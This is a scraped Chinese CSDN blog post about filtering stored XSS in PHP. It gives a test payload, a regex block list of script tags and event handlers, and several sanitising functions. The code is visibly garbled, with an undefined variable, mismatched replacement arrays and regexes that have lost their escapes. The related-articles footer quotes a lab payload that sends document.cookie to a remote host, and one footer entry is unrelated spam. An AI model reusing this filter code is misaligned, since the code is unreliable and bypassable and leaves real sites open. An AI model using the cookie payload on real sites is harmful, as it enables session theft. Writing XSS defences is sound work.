xss php 转义_php 过滤存储型XSS攻击

最新推荐文章于 2022-07-24 10:04:50 发布
最新推荐文章于 2022-07-24 10:04:50 发布
阅读量140 收藏
点赞数
文章标签: xss php 转义
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35762215/article/details/115103830
版权

PHP XSS 存储型XSS 过滤函数 安全实践
关键词由CSDN通过智能技术生成

最近做的项目被测试测出了存在存储型XSS,至此记录一下,问题出在了 input 框 :payload:"a" οnclick=alert(1)>

也做了一些XSS过滤,但是不全,有从网上找了一些,弄了一个简单粗暴的;

后台接收 input 框字符串内容,存在被攻击,便整理了一个比较粗暴的方法

//过滤存储型XSS攻击//过滤存储型XSS攻击

public function safe_filter(&$string)

{

$ra=Array('/([x00-x08,x0b-x0c,x0e-x19])/','/script/','/javascript/','/vbscript/','/expression/','/applet/','/meta/','/xml/','/blink/','/link/','/style/','/embed/','/object/','/frame/','/layer/','/title/','/bgsound/','/base/','/onload/','/onunload/','/onchange/','/onsubmit/','/onreset/','/onselect/','/onblur/','/onfocus/','/onabort/','/onkeydown/','/onkeypress/','/onkeyup/','/onclick/','/ondblclick/','/onmousedown/','/onmousemove/','/onmouseout/','/onmouseover/','/onmouseup/','/onunload/');

$data=str_replace(array('&',''),array('&','<','>'),$data);

if (!get_magic_quotes_gpc()) //不对magic_quotes_gpc转义过的字符使用 addslashes(),避免双重转义。

{

$string = addslashes($string); //给单引号(')、双引号(")、反斜线()与 NUL(NULL 字符)加上反斜线转义

}

$string = preg_replace($ra,'',$string); //删除非打印字符,粗暴式过滤xss可疑字符串

$laststring = htmlentities(strip_tags($string)); //去除 HTML 和 PHP 标记并转换为 HTML 实体

return $laststring;

}

后来,认为这些太过粗暴,就又整理了一些,以后方便参照:/**

* 过滤html标签,引号,中文空格

*/

function fileter_str( $str )

{

$str = addslashes(trim($str));

$str = preg_replace("//","",$str);

$str = str_replace("_x000D_","",$str); //替换空格为

//注释上一行因为:导入英语试题会将所有空格去掉

// $str = str_replace(' ','',$str);

return $str;

}

还有:/**

* 过滤html标签,引号,中文空格,换行符

*/

function fileter_add_str( $str )

{

$str = str_replace("_x000D_","",$str); //替换空格为

$str = str_replace(array("

", "", "

",""), "
", $str);//替换回车换行

$str = str_replace("'", "'", $str);

// $str = str_replace(' ','',$str);

return $str;

}

还有这些://全角到半角的转换,$str待转换的字符串,$flag标识符,$flag=0半角到全角,$flag=1全角到半角

function SBC_DBC($str, $flag) {

$DBC = Array(//全角

'0' , '1' , '2' , '3' , '4' ,

'5' , '6' , '7' , '8' , '9' ,

'A','B' , 'C' , 'D' , 'E' ,

'F' , 'G' , 'H' , 'I' , 'J' ,

'K' , 'L' , 'M' , 'N' , 'O' ,

'P' , 'Q' , 'R' , 'S' , 'T' ,

'U' , 'V' , 'W' , 'X' , 'Y' ,

'Z' , 'a' , 'b' , 'c' , 'd' ,

'e' , 'f' , 'g' , 'h' , 'i' ,

'j' , 'k' , 'l' , 'm' , 'n' ,

'o' , 'p' , 'q' , 'r' , 's' ,

't' , 'u' , 'v' , 'w' , 'x' ,

'y' , 'z' , '-' , ' ' , ':' ,

'.' , ',' , '/' , '%' , '#' ,

'!' , '@' , '&' , '(' , ')' ,

'<' , '>' , '"' , ''' , '?' ,

'[' , ']' , '{' , '}' , '\' ,

'|' , '+' , '=' , '_' , '^' ,

'¥' , ' ̄' , '`'

);

$SBC = Array( // 半角

'0', '1', '2', '3', '4',

'5', '6', '7', '8', '9',

'A', 'B', 'C', 'D', 'E',

'F', 'G', 'H', 'I', 'J',

'K', 'L', 'M', 'N', 'O',

'P', 'Q', 'R', 'S', 'T',

'U', 'V', 'W', 'X', 'Y',

'Z', 'a', 'b', 'c', 'd',

'e', 'f', 'g', 'h', 'i',

'j', 'k', 'l', 'm', 'n',

'o', 'p', 'q', 'r', 's',

't', 'u', 'v', 'w', 'x',

'y', 'z', '-', ' ', ':',

'.', ',', '/', '%', '#',

'!', '@', '&', '(', ')',

'', '"', ''','?',

'[', ']', '{', '}', '\',

'|', '+', '=', '_', '^',

'$', '~', '`'

);

if ($flag == 0) {

return str_replace($SBC, $DBC, $str); // 半角到全角

} else if ($flag == 1) {

return str_replace($DBC, $SBC, $str); // 全角到半角

} else {

return false;

}

}

仅供参考

更多PHP相关知识,请访问PHP教程!

武藏美-伊雯
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php 过滤存储XSS攻击
散尽浮华
06-21 3999
最近做的项目被测试测出了存在存储XSS,至此记录一下,问题出在了 input 框 :payload:"a" onclick=alert(1)> 也做了一些XSS过滤,但是不全,有从网上找了一些,弄了一个简单粗暴的 后台接收 input 框字符串内容,存在被攻击,便整理了一个比较粗暴的方法 //过滤存储XSS攻击 //过滤存储XSS攻击 public function safe...
php实现XSS安全过滤的方法
10-23
6. 检测和防御:根据XSS攻击的类存储XSS、反射XSS、DOMXSS),设计相应的检测和防御机制。针对不同类XSS攻击采用不同的过滤策略。 7. 常用的XSS攻击向量:在开发过滤函数时,需要特别注意那些常见的...
PHP Web 应用程序中防止 XSS 的最佳实践
allway2的博客
07-24 358
如果您拥有与任何其他用户类似的cookie,您可以在浏览器中访问他们的所有数据,因为您在恶意搜索框中进行了搜索。跨站点脚本创建的风险比您预期的要高,因为它不仅允许攻击者获取用户数据和信息,这是许多其他漏洞在此攻击中旨在实现的使用XSS有一个附加功能攻击者在网站上犯下这些罪行,在用户看来,这些网站应该是完全值得信赖的,所以他们不必担心这种盗窃行为的发生,也不必考虑戴上眼罩。稍后,当网络用户访问该页面时,他可能会在不知不觉中检索该文件,因此脚本将在用户的浏览器中运行。这种攻击的严重性非常高。...
php防止xss攻击
u013695932的博客
05-09 298
<?PHP function clean_xss(&$string, $low = False) { if (!is_array($string)) { $string = trim($string); $string = strip_tags($string); $string = htmlspecialchars($string); if ($low) { return True; ...
PHP代码审计——存储XSS(华科企业网站管理系统 -hkqyglxt )
W小哥
03-24 391
一、漏洞描述 在留言内容中,将数组和数据分别进行处理,输入字符时实体化存储到数据库中,查看数据时将数据进行还原处理,当管理员查看留言内容时,触发XSS 在我的资源中下载::hkqyglxt-含有存储XSS漏洞的源码包 下载即可 二、代码审计 2.1 查看代码 2.2.1 第一个漏洞文件位置 在 /admin/cms_channel_add.php 文件中 2.2.1.1 代码审计 在图中红框 标记起来的位置,存在问题 以“请填写导航名称”这一句 为例,其余几句参照本例即可 null_back($_PO
php代码审计【7】存储xss
司徒荆的博客
06-26 584
php代码审计【7】存储xss
PHPXSS跨站攻击的防范
10-30
1. **存储XSS**:攻击者的恶意脚本被存储在目标服务器上,并且每次受害者访问该页面时都会执行。 2. **反射XSS**:恶意脚本通过URL参数传入,当受害者点击恶意链接时触发。 3. **DOMXSS**:这种类XSS利用...
XSS.zip_XSS_c xss
最新发布
09-24
2. **存储XSS(Persistent XSS)**:又称持久性XSS,攻击者将恶意脚本存储在服务器端,例如在论坛发帖、评论区留言等。当其他用户浏览这些页面时,恶意脚本会自动执行。 3. **DOMXSS(DOM-Based XSS)**:不...
ourphp存储xss漏洞1
08-03
存储XSS允许攻击者将恶意代码存储在服务器上,当其他用户访问这些被污染的数据时,恶意脚本会在用户的浏览器中执行。 漏洞分析: 此XSS漏洞源于OurPHP搜索功能的输入过滤不严。在...
ourphp 站内信存储xss漏洞1
08-04
存储XSS漏洞是指攻击者将恶意代码存储在服务器上,而不是反射到用户浏览器上,这使得攻击者可以在服务器上存储恶意代码,以便日后攻击其他用户。在OurPHP 1.7.1版本中,站内信存储XSS漏洞就存在于站内信模块中。...
存储XSS清除方法
weixin_50339832的博客
06-06 2029
今天也是被自己气哭的一天 今天做XSS盗取cookie实验 <script>document.location='http://192.168.241.1/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script> 就是用这个罪恶的p
xss攻击解决方案php项目,xss攻击原理与解决方法
weixin_39907157的博客
03-11 681
xss攻击原理与解决方法xss攻击是什么?说直白点就是把html通过评论等输入框,把html代码输入到数据,再次显示用户输入的内容时候就会把他评论的内容的html代码执行掉,比如用户输入'alert('document.cookie');',在刷新页面时候就会执行这段代码执行,如图:如果用户的一些重要数据存储在cookie中,这时候就可以直接被打印出来,用户信息就一目了然了。xss解决方法PHP防...
如何在 PHP 中防止 XSS
allway2的博客
07-24 2127
要解决此问题,您需要将htmlspecialchars()与所需参数一起使用,如果您在URL中使用用户数据,则将其与urlencode()函数结合使用。实际上,您可能会注意到,在Codeigniter部分中,我没有讨论属性问题,我已经在其他框架中讨论过。这三种类的最大区别在于,在存储XSS中,用户数据保存在数据库中,这与反射和基于DOM的XSS漏洞相反。现在,当我问我的大多数客户和学生,这个漏洞的影响是什么时,他们不断地告诉我,比如窃取用户信息、控制应用程序等等,仅此而已。...
Php修复xss,可以使用三个php函数修补xss漏洞
weixin_42306699的博客
04-10 679
php中修补xss漏洞,我们可以使用三个php函数。这些函数主要用于清除html标志,这样就没办法注入代码了。使用更多的函数是htmlspecialchars() ,它可以将所有的""符号转换成"<" 与"&gt;"。其它可供选择的函数还有htmlentities(), 它可以用相应的字符实体(entities)替换掉所有想要替换掉的特征码(characters)。php code...
Web安全之XSS攻击解决方案
thisIsDennis的博客
03-17 615
一.XSS介绍 网站中包含大量的动态内容以提高用户体验,比过去要复杂得多。所谓动态内容,就是根据用户环境和需要,Web应用程序能够输出相应的内容。动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完...
php xss漏洞解决,PHP漏洞全解(四)-xss跨站脚本***
weixin_32666933的博客
03-22 152
Beats By Dr Dre Studio Pittsburgh Steelers HighDefinition UK:Beats By Dr.Dre Studio Colorful Champagne Limited Edition UK,Beats By Dr.Dre Studio Colorware Chrome Limited Edition UK,Beats By Dr.Dre Stu...
PHP防止跨站和xss攻击代码
云博客_资源宝分享
07-09 1140
这篇文章主要介绍了PHP实现的防止跨站和xss攻击代码,是一款来自阿里云的防注入脚本,可实现针对注入、XSS攻击等的过滤功能,需要的朋友可以参考下 本文实例讲述了PHP实现的防止跨站和xss攻击代码。分享给大家供大家参考,具体如下: 文档说明: 1.将waf.php传到要包含的文件的目录 2.在页面中加入防护,有两种做法,根据情况二选一即可: a).在所需要防护的页面加入代码 require_once(‘waf.php’); 就可以做到页面防注入、跨站 如果想整站防注,就在网站的一个公用文件中,如数据库链接
php简单模拟基于存储XSS攻击
洞妖呼叫洞妖的博客
04-26 289
原理:将xss攻击代码保存到数据库内,动态显示在web页面上 我们以本地服务器作为被攻击者目标,攻击者服务器为http://phalcon.xyz:8080 1.新建一个文件,命名为message.php <?php session_start(); //连接数据库 try { $con = new PDO('mysql:host=127.0.0.1;dbname=xss_mess...
xss php注入攻击,PHP_解析xss攻击、sql注入
weixin_36337548的博客
03-10 201
/*** PHP解决XSS(跨站脚本攻击)的调用函数* PHP跨站脚本漏洞补丁,去除XSS(跨站脚本攻击)的函数,把以下代码保存在function.php文件中,在需要防御的页面中include* Enter description here ...* @param unknown_type $val*/function RemoveXSS($val) {$val= preg_replace(‘/...
存储XSS攻击:成因、挖掘与防御策略
存储XSS(跨站脚本攻击)是Web安全领域的一种常见漏洞类,它发生在用户的敏感数据在服务器端被恶意编码并持久地存储于数据库中,然后在后续的用户访问时被读取并执行。这种攻击形式的特点在于,攻击代码不是临时...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值